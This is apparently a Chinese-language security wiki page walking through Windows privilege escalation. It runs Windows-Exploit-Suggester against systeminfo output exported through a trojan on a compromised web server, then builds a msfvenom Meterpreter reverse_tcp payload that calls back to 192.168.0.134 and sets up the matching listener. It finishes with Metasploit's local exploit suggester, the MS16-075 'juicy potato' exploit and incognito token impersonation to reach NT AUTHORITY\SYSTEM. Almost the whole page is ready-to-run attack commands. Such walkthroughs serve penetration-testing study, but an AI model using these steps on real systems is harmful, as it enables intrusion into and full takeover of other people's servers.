00:00
上午
周一
1月1日
枫-WIKI

WE Suggester

YOUZAI2023/06/21漏洞扫描安全工具

下载

https://github.com/GDSSecurity/Windows-Exploit-Suggesteropen in new window

或者使用 kali:

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

用法

首先安装库:

pip install xlrd –upgrade

更新漏洞补丁库:

./windows-exploit-suggester.py –update

表里面的内容:

利用木马导出目标主机的系统信息:

systeminfo >C:\inetpub\wwwroot\www.demo1.com\systeminfo.txt

查找可以利用的补丁:

./windows-exploit-suggester.py –database 2019-05-02-mssb.xls –systeminfo systeminfo.txt >exp.txt

里面有详细的说明可以漏洞利用的 exp,查找指定系统的可以用的漏洞:

./windows-exploit-suggester.py –database 2019-05-02-mssb.xls –ostext ‘windows server 2008 r2’

显示可利用的本地提权的条目:

./windows-exploit-suggester.py –audit -l –database 2019-05-02-mssb.xls –systeminfo systeminfo.txt >win2008-day.txt

如果补丁没有打上的情况下,就会显示可以利用的 ms 编号 exp 的地址和描述。

提权 exp windows-kernel-exploits

下载: https://github.com/SecWiki/windows-kernel-exploitsopen in new window

利用msf攻击,生成攻击载荷:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134 lport=12345 -f exe >/var/www/html/s.exe

监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.134
set lport 12345
exploit

![](/images/image 20210522142900.png)

得到一个低权限的shell。

提示

background:返回模块选择的命令把 session 放到后台。

使用suggester模块:

use post/multi/recon/local_exploit_suggester
show options
set seesion 1
exploit

![](/images/image 20210522143028.png)

使用模块 windows/local/ms16_075_reflection_juicy 进行攻击:

use windows/local/ms16_075_reflection_juicy
show options #查看参数
set session 1
exploit

![](/images/image 20210522143232.png)

得到系统权限。

使用 MS16-075 提权,选择第一个 session。

sessions 1
use incognito
list_tokens -u //列出tokens
execute -cH -f C:/inetpub/wwwroot/www.demo1.com/potato.exe //执行exp
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM” //提权

这个要多试用多次,方可成功。


Last Updated 2023/6/23 23:07:00